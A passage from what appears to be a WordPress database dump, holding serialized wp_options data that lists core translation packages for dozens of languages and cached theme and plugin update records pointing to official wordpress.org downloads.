15:32:08\";s:12:\"english_name\";s:7:\"Marathi\";s:11:\"native_name\";s:15:\"मराठी\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.9.22/mr.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"mr\";i:2;s:3:\"mar\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:25:\"सुरु ठेवा\";}}s:5:\"ms_MY\";a:8:{s:8:\"language\";s:5:\"ms_MY\";s:7:\"version\";s:6:\"5.5.11\";s:7:\"updated\";s:19:\"2022-03-11 13:52:22\";s:12:\"english_name\";s:5:\"Malay\";s:11:\"native_name\";s:13:\"Bahasa Melayu\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/5.5.11/ms_MY.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ms\";i:2;s:3:\"msa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Teruskan\";}}s:5:\"my_MM\";a:8:{s:8:\"language\";s:5:\"my_MM\";s:7:\"version\";s:6:\"4.2.34\";s:7:\"updated\";s:19:\"2017-12-26 11:57:10\";s:12:\"english_name\";s:17:\"Myanmar (Burmese)\";s:11:\"native_name\";s:15:\"ဗမာစာ\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/4.2.34/my_MM.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"my\";i:2;s:3:\"mya\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:54:\"ဆက်လက်လုပ်ဆောင်ပါ။\";}}s:5:\"nb_NO\";a:8:{s:8:\"language\";s:5:\"nb_NO\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-10-26 02:16:42\";s:12:\"english_name\";s:19:\"Norwegian (Bokmål)\";s:11:\"native_name\";s:13:\"Norsk bokmål\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/nb_NO.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nb\";i:2;s:3:\"nob\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Fortsett\";}}s:5:\"ne_NP\";a:8:{s:8:\"language\";s:5:\"ne_NP\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-07 07:26:22\";s:12:\"english_name\";s:6:\"Nepali\";s:11:\"native_name\";s:18:\"नेपाली\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/ne_NP.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ne\";i:2;s:3:\"nep\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:43:\"जारी राख्नुहोस्\";}}s:12:\"nl_NL_formal\";a:8:{s:8:\"language\";s:12:\"nl_NL_formal\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-09-30 06:51:35\";s:12:\"english_name\";s:14:\"Dutch (Formal)\";s:11:\"native_name\";s:20:\"Nederlands (Formeel)\";s:7:\"package\";s:69:\"https://downloads.wordpress.org/translation/core/6.1/nl_NL_formal.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nl\";i:2;s:3:\"nld\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Doorgaan\";}}s:5:\"nl_BE\";a:8:{s:8:\"language\";s:5:\"nl_BE\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-05 12:58:59\";s:12:\"english_name\";s:15:\"Dutch (Belgium)\";s:11:\"native_name\";s:20:\"Nederlands (België)\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/nl_BE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nl\";i:2;s:3:\"nld\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Doorgaan\";}}s:5:\"nl_NL\";a:8:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-07 11:49:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/nl_NL.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nl\";i:2;s:3:\"nld\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Doorgaan\";}}s:5:\"nn_NO\";a:8:{s:8:\"language\";s:5:\"nn_NO\";s:7:\"version\";s:8:\"5.8-beta\";s:7:\"updated\";s:19:\"2021-03-18 10:59:16\";s:12:\"english_name\";s:19:\"Norwegian (Nynorsk)\";s:11:\"native_name\";s:13:\"Norsk nynorsk\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/translation/core/5.8-beta/nn_NO.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nn\";i:2;s:3:\"nno\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Hald fram\";}}s:3:\"oci\";a:8:{s:8:\"language\";s:3:\"oci\";s:7:\"version\";s:6:\"4.8.21\";s:7:\"updated\";s:19:\"2017-08-25 10:03:08\";s:12:\"english_name\";s:7:\"Occitan\";s:11:\"native_name\";s:7:\"Occitan\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/4.8.21/oci.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"oc\";i:2;s:3:\"oci\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Contunhar\";}}s:5:\"pa_IN\";a:8:{s:8:\"language\";s:5:\"pa_IN\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-16 05:19:43\";s:12:\"english_name\";s:15:\"Panjabi (India)\";s:11:\"native_name\";s:18:\"ਪੰਜਾਬੀ\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/pa_IN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"pa\";i:2;s:3:\"pan\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:25:\"ਜਾਰੀ ਰੱਖੋ\";}}s:5:\"pl_PL\";a:8:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-02 06:41:43\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/pl_PL.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"pl\";i:2;s:3:\"pol\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Kontynuuj\";}}s:2:\"ps\";a:8:{s:8:\"language\";s:2:\"ps\";s:7:\"version\";s:6:\"4.3.30\";s:7:\"updated\";s:19:\"2015-12-02 21:41:29\";s:12:\"english_name\";s:6:\"Pashto\";s:11:\"native_name\";s:8:\"پښتو\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.3.30/ps.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ps\";i:2;s:3:\"pus\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:19:\"دوام ورکړه\";}}s:10:\"pt_PT_ao90\";a:8:{s:8:\"language\";s:10:\"pt_PT_ao90\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-08-09 12:26:21\";s:12:\"english_name\";s:27:\"Portuguese (Portugal, AO90)\";s:11:\"native_name\";s:17:\"Português (AO90)\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/translation/core/6.1/pt_PT_ao90.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"pt\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"pt_BR\";a:8:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-05 11:49:18\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/pt_BR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"pt\";i:2;s:3:\"por\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"pt_PT\";a:8:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-05 19:16:37\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/pt_PT.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"pt\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"pt_AO\";a:8:{s:8:\"language\";s:5:\"pt_AO\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-10-01 12:16:29\";s:12:\"english_name\";s:19:\"Portuguese (Angola)\";s:11:\"native_name\";s:20:\"Português de Angola\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/pt_AO.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"pt\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:3:\"rhg\";a:8:{s:8:\"language\";s:3:\"rhg\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-03-16 13:03:18\";s:12:\"english_name\";s:8:\"Rohingya\";s:11:\"native_name\";s:8:\"Ruáinga\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/rhg.zip\";s:3:\"iso\";a:1:{i:3;s:3:\"rhg\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"ro_RO\";a:8:{s:8:\"language\";s:5:\"ro_RO\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-02 10:43:21\";s:12:\"english_name\";s:8:\"Romanian\";s:11:\"native_name\";s:8:\"Română\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/ro_RO.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ro\";i:2;s:3:\"ron\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuă\";}}s:5:\"ru_RU\";a:8:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-10-24 16:24:29\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/ru_RU.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ru\";i:2;s:3:\"rus\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Продолжить\";}}s:3:\"sah\";a:8:{s:8:\"language\";s:3:\"sah\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-21 02:06:41\";s:12:\"english_name\";s:5:\"Sakha\";s:11:\"native_name\";s:14:\"Сахалыы\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/sah.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"sah\";i:3;s:3:\"sah\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Салҕаа\";}}s:3:\"snd\";a:8:{s:8:\"language\";s:3:\"snd\";s:7:\"version\";s:6:\"5.4.12\";s:7:\"updated\";s:19:\"2020-07-07 01:53:37\";s:12:\"english_name\";s:6:\"Sindhi\";s:11:\"native_name\";s:8:\"سنڌي\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/5.4.12/snd.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"sd\";i:2;s:3:\"snd\";i:3;s:3:\"snd\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:15:\"اڳتي هلو\";}}s:5:\"si_LK\";a:8:{s:8:\"language\";s:5:\"si_LK\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-11-12 06:00:52\";s:12:\"english_name\";s:7:\"Sinhala\";s:11:\"native_name\";s:15:\"සිංහල\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/si_LK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"si\";i:2;s:3:\"sin\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:44:\"දිගටම කරගෙන යන්න\";}}s:5:\"sk_SK\";a:8:{s:8:\"language\";s:5:\"sk_SK\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-07 09:38:41\";s:12:\"english_name\";s:6:\"Slovak\";s:11:\"native_name\";s:11:\"Slovenčina\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/sk_SK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sk\";i:2;s:3:\"slk\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Pokračovať\";}}s:3:\"skr\";a:8:{s:8:\"language\";s:3:\"skr\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-06 09:43:42\";s:12:\"english_name\";s:7:\"Saraiki\";s:11:\"native_name\";s:14:\"سرائیکی\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/translation/core/6.1/skr.zip\";s:3:\"iso\";a:1:{i:3;s:3:\"skr\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:17:\"جاری رکھو\";}}s:5:\"sl_SI\";a:8:{s:8:\"language\";s:5:\"sl_SI\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-04 10:49:49\";s:12:\"english_name\";s:9:\"Slovenian\";s:11:\"native_name\";s:13:\"Slovenščina\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/sl_SI.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sl\";i:2;s:3:\"slv\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Nadaljuj\";}}s:2:\"sq\";a:8:{s:8:\"language\";s:2:\"sq\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-10-30 08:43:36\";s:12:\"english_name\";s:8:\"Albanian\";s:11:\"native_name\";s:5:\"Shqip\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/6.1/sq.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sq\";i:2;s:3:\"sqi\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Vazhdo\";}}s:5:\"sr_RS\";a:8:{s:8:\"language\";s:5:\"sr_RS\";s:7:\"version\";s:5:\"5.8.6\";s:7:\"updated\";s:19:\"2021-08-01 21:21:06\";s:12:\"english_name\";s:7:\"Serbian\";s:11:\"native_name\";s:23:\"Српски језик\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/5.8.6/sr_RS.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sr\";i:2;s:3:\"srp\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:14:\"Настави\";}}s:5:\"sv_SE\";a:8:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-10-31 15:22:15\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/sv_SE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sv\";i:2;s:3:\"swe\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Fortsätt\";}}s:2:\"sw\";a:8:{s:8:\"language\";s:2:\"sw\";s:7:\"version\";s:6:\"5.3.14\";s:7:\"updated\";s:19:\"2019-10-13 15:35:35\";s:12:\"english_name\";s:7:\"Swahili\";s:11:\"native_name\";s:9:\"Kiswahili\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/5.3.14/sw.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sw\";i:2;s:3:\"swa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Endelea\";}}s:3:\"szl\";a:8:{s:8:\"language\";s:3:\"szl\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-09-24 19:58:14\";s:12:\"english_name\";s:8:\"Silesian\";s:11:\"native_name\";s:17:\"Ślōnskŏ gŏdka\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/szl.zip\";s:3:\"iso\";a:1:{i:3;s:3:\"szl\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:13:\"Kōntynuować\";}}s:5:\"ta_IN\";a:8:{s:8:\"language\";s:5:\"ta_IN\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-27 03:22:47\";s:12:\"english_name\";s:5:\"Tamil\";s:11:\"native_name\";s:15:\"தமிழ்\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/ta_IN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ta\";i:2;s:3:\"tam\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:24:\"தொடரவும்\";}}s:5:\"ta_LK\";a:8:{s:8:\"language\";s:5:\"ta_LK\";s:7:\"version\";s:6:\"4.2.34\";s:7:\"updated\";s:19:\"2015-12-03 01:07:44\";s:12:\"english_name\";s:17:\"Tamil (Sri Lanka)\";s:11:\"native_name\";s:15:\"தமிழ்\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/4.2.34/ta_LK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ta\";i:2;s:3:\"tam\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:18:\"தொடர்க\";}}s:2:\"te\";a:8:{s:8:\"language\";s:2:\"te\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-26 15:47:39\";s:12:\"english_name\";s:6:\"Telugu\";s:11:\"native_name\";s:18:\"తెలుగు\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/te.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"te\";i:2;s:3:\"tel\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:30:\"కొనసాగించు\";}}s:2:\"th\";a:8:{s:8:\"language\";s:2:\"th\";s:7:\"version\";s:5:\"5.8.6\";s:7:\"updated\";s:19:\"2022-06-08 04:30:30\";s:12:\"english_name\";s:4:\"Thai\";s:11:\"native_name\";s:9:\"ไทย\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/5.8.6/th.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"th\";i:2;s:3:\"tha\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:15:\"ต่อไป\";}}s:2:\"tl\";a:8:{s:8:\"language\";s:2:\"tl\";s:7:\"version\";s:6:\"4.8.21\";s:7:\"updated\";s:19:\"2017-09-30 09:04:29\";s:12:\"english_name\";s:7:\"Tagalog\";s:11:\"native_name\";s:7:\"Tagalog\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.8.21/tl.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"tl\";i:2;s:3:\"tgl\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"Magpatuloy\";}}s:5:\"tr_TR\";a:8:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-04 23:05:35\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/tr_TR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"tr\";i:2;s:3:\"tur\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Devam\";}}s:5:\"tt_RU\";a:8:{s:8:\"language\";s:5:\"tt_RU\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-11-20 20:20:50\";s:12:\"english_name\";s:5:\"Tatar\";s:11:\"native_name\";s:19:\"Татар теле\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/tt_RU.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"tt\";i:2;s:3:\"tat\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:17:\"дәвам итү\";}}s:3:\"tah\";a:8:{s:8:\"language\";s:3:\"tah\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-03-06 18:39:39\";s:12:\"english_name\";s:8:\"Tahitian\";s:11:\"native_name\";s:10:\"Reo Tahiti\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/tah.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"ty\";i:2;s:3:\"tah\";i:3;s:3:\"tah\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"ug_CN\";a:8:{s:8:\"language\";s:5:\"ug_CN\";s:7:\"version\";s:6:\"4.9.22\";s:7:\"updated\";s:19:\"2021-07-03 18:41:33\";s:12:\"english_name\";s:6:\"Uighur\";s:11:\"native_name\";s:16:\"ئۇيغۇرچە\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/4.9.22/ug_CN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ug\";i:2;s:3:\"uig\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:26:\"داۋاملاشتۇرۇش\";}}s:2:\"uk\";a:8:{s:8:\"language\";s:2:\"uk\";s:7:\"version\";s:5:\"6.0.3\";s:7:\"updated\";s:19:\"2022-09-11 15:51:48\";s:12:\"english_name\";s:9:\"Ukrainian\";s:11:\"native_name\";s:20:\"Українська\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.0.3/uk.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"uk\";i:2;s:3:\"ukr\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Продовжити\";}}s:2:\"ur\";a:8:{s:8:\"language\";s:2:\"ur\";s:7:\"version\";s:6:\"5.4.12\";s:7:\"updated\";s:19:\"2020-04-09 11:17:33\";s:12:\"english_name\";s:4:\"Urdu\";s:11:\"native_name\";s:8:\"اردو\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/5.4.12/ur.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ur\";i:2;s:3:\"urd\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:19:\"جاری رکھیں\";}}s:5:\"uz_UZ\";a:8:{s:8:\"language\";s:5:\"uz_UZ\";s:7:\"version\";s:8:\"5.8-beta\";s:7:\"updated\";s:19:\"2021-02-28 12:02:22\";s:12:\"english_name\";s:5:\"Uzbek\";s:11:\"native_name\";s:11:\"O‘zbekcha\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/translation/core/5.8-beta/uz_UZ.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"uz\";i:2;s:3:\"uzb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:11:\"Davom etish\";}}s:2:\"vi\";a:8:{s:8:\"language\";s:2:\"vi\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-08-24 07:53:05\";s:12:\"english_name\";s:10:\"Vietnamese\";s:11:\"native_name\";s:14:\"Tiếng Việt\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/6.1/vi.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"vi\";i:2;s:3:\"vie\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Tiếp tục\";}}s:5:\"zh_TW\";a:8:{s:8:\"language\";s:5:\"zh_TW\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-01 09:56:00\";s:12:\"english_name\";s:16:\"Chinese (Taiwan)\";s:11:\"native_name\";s:12:\"繁體中文\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/zh_TW.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"zh\";i:2;s:3:\"zho\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"繼續\";}}s:5:\"zh_CN\";a:8:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-08-15 08:22:28\";s:12:\"english_name\";s:15:\"Chinese (China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/zh_CN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"zh\";i:2;s:3:\"zho\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"继续\";}}s:5:\"zh_HK\";a:8:{s:8:\"language\";s:5:\"zh_HK\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-07-15 15:25:03\";s:12:\"english_name\";s:19:\"Chinese (Hong Kong)\";s:11:\"native_name\";s:12:\"香港中文\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/zh_HK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"zh\";i:2;s:3:\"zho\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"繼續\";}}}','no'),(188203,'_site_transient_timeout_theme_roots','1667843214','no'),(188204,'_site_transient_theme_roots','a:4:{s:12:\"twentytwenty\";s:7:\"/themes\";s:15:\"twentytwentyone\";s:7:\"/themes\";s:17:\"twentytwentythree\";s:7:\"/themes\";s:15:\"twentytwentytwo\";s:7:\"/themes\";}','no'),(188205,'_site_transient_update_themes','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1667841415;s:7:\"checked\";a:4:{s:12:\"twentytwenty\";s:3:\"2.0\";s:15:\"twentytwentyone\";s:3:\"1.6\";s:17:\"twentytwentythree\";s:3:\"1.0\";s:15:\"twentytwentytwo\";s:3:\"1.2\";}s:8:\"response\";a:3:{s:12:\"twentytwenty\";a:6:{s:5:\"theme\";s:12:\"twentytwenty\";s:11:\"new_version\";s:3:\"2.1\";s:3:\"url\";s:42:\"https://wordpress.org/themes/twentytwenty/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/theme/twentytwenty.2.1.zip\";s:8:\"requires\";s:3:\"4.7\";s:12:\"requires_php\";s:5:\"5.2.4\";}s:15:\"twentytwentyone\";a:6:{s:5:\"theme\";s:15:\"twentytwentyone\";s:11:\"new_version\";s:3:\"1.7\";s:3:\"url\";s:45:\"https://wordpress.org/themes/twentytwentyone/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentytwentyone.1.7.zip\";s:8:\"requires\";s:3:\"5.3\";s:12:\"requires_php\";s:3:\"5.6\";}s:15:\"twentytwentytwo\";a:6:{s:5:\"theme\";s:15:\"twentytwentytwo\";s:11:\"new_version\";s:3:\"1.3\";s:3:\"url\";s:45:\"https://wordpress.org/themes/twentytwentytwo/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentytwentytwo.1.3.zip\";s:8:\"requires\";s:3:\"5.9\";s:12:\"requires_php\";s:3:\"5.6\";}}s:9:\"no_update\";a:1:{s:17:\"twentytwentythree\";a:6:{s:5:\"theme\";s:17:\"twentytwentythree\";s:11:\"new_version\";s:3:\"1.0\";s:3:\"url\";s:47:\"https://wordpress.org/themes/twentytwentythree/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/theme/twentytwentythree.1.0.zip\";s:8:\"requires\";s:3:\"6.1\";s:12:\"requires_php\";s:3:\"5.6\";}}s:12:\"translations\";a:0:{}}','no'),(188206,'_site_transient_update_plugins','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1667841416;s:8:\"response\";a:4:{s:19:\"akismet/akismet.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:21:\"w.org/plugins/akismet\";s:4:\"slug\";s:7:\"akismet\";s:6:\"plugin\";s:19:\"akismet/akismet.php\";s:11:\"new_version\";s:5:\"5.0.1\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/akismet/\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/plugin/akismet.5.0.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:59:\"https://ps.w.org/akismet/assets/icon-256x256.png?rev=969272\";s:2:\"1x\";s:59:\"https://ps.w.org/akismet/assets/icon-128x128.png?rev=969272\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:61:\"https://ps.w.org/akismet/assets/banner-772x250.jpg?rev=479904\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.0\";s:6:\"tested\";s:5:\"6.0.3\";s:12:\"requires_php\";s:3:\"5.2\";}s:35:\"carousel-slider/carousel-slider.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:29:\"w.org/plugins/carousel-slider\";s:4:\"slug\";s:15:\"carousel-slider\";s:6:\"plugin\";s:35:\"carousel-slider/carousel-slider.php\";s:11:\"new_version\";s:5:\"2.1.1\";s:3:\"url\";s:46:\"https://wordpress.org/plugins/carousel-slider/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/carousel-slider.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:60:\"https://ps.w.org/carousel-slider/assets/icon.svg?rev=2652128\";s:3:\"svg\";s:60:\"https://ps.w.org/carousel-slider/assets/icon.svg?rev=2652128\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:71:\"https://ps.w.org/carousel-slider/assets/banner-1544x500.jpg?rev=1746085\";s:2:\"1x\";s:70:\"https://ps.w.org/carousel-slider/assets/banner-772x250.jpg?rev=1746085\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.6\";s:6:\"tested\";s:5:\"6.0.3\";s:12:\"requires_php\";s:3:\"7.0\";}s:36:\"contact-form-7/wp-contact-form-7.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:28:\"w.org/plugins/co